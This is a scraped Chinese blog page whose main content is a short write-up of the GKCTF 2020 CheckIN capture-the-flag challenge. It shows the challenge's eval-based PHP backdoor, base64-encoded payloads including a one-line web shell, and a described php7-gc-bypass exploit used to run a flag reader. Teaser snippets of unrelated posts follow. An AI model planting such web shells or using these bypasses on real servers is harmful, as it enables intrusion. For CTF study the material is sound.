news 2026/4/15 11:14:58

[GKCTF 2020]CheckIN

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
[GKCTF 2020]CheckIN

classClassName{public$code=null;public$decode=null;function__construct(){// 1. 从 $_REQUEST(GET/POST/Cookie)中获取「Ginkgo」参数的值$this->code=@$this->x()['Ginkgo'];// 2. 对 Ginkgo 的值做 base64 解码$this->decode=@base64_decode($this->code);// 3. 执行解码后的代码@Eval($this->decode);}publicfunctionx(){return$_REQUEST;}}newClassName();// 实例化类,自动触发 __construct 方法

就是执行用base64加密的$_REQUEST传入的参数Ginkgo
phpinfo();加密后为cGhwaW5mbygpOw==

/?Ginkgo=cGhwaW5mbygpOw==


没禁用eval等函数

传一句话木马连接上shell。
eval($_POST[pwd]);加密后为ZXZhbCgkX1BPU1RbcHdkXSk7

打开却显示flag为空。
发现readflag文件,应该是运行这个文件来读flag。

php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令
影响范围是linux,php7.0-7.3

php7-gc-bypass漏洞源于 PHP 垃圾回收(GC)机制中的堆溢出,PHP 的 GC 在处理循环引用的变量时,会对内存块进行标记和回收。漏洞存在于内存块的大小计算逻辑中,恶意构造的循环引用变量会触发堆溢出,覆盖相邻内存数据。因此利用堆溢出可篡改函数指针,最终执行任意系统命令。

网上有EXP ( Exploit ),修改一下执行对象为readflag。
修改后上传文件至tmp目录下。

include('/tmp/exploit.php');加密后为aW5jbHVkZSgnL3RtcC9leHBsb2l0LnBocCcpOw==

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/15 10:27:04

PyTorch 分布式训练底层原理与 DDP 实战指南

深度学习模型参数量和训练数据集的爆炸式增长,以 Llama 3.1 为例:4050 亿参数、15.6 万亿 token 的训练量,如果仅靠单 GPU可能需要数百年才能跑完,或者根本无法加载模型。并行计算(Parallelism)通过将训练任…

作者头像 李华
网站建设 2026/4/13 19:39:52

求职兼职招聘系统源码 Python+Django+Vue 前后分离 设计文档

一、关键词求职招聘系统、兼职平台、招聘管理系统、求职系统、兼职招聘平台二、作品包含源码数据库万字设计文档全套环境和工具资源本地部署教程三、项目技术前端技术: Html、Css、Js、Vue3.2、Element-Plus后端技术:Python3.7、Django2.0、PyMySQL四、运…

作者头像 李华
网站建设 2026/4/13 9:13:39

为什么越来越多跨境卖家从平台转向独立站?

过去几年,我持续研究跨境电商增长模型,也观察到大量卖家从“单一平台依赖”走向“品牌化独立站”的转型过程。无论是年销售千万的工厂型卖家,还是从 0 到 1 的 DTC 团队,都在用同样一句话总结——“平台越来越难做了,独…

作者头像 李华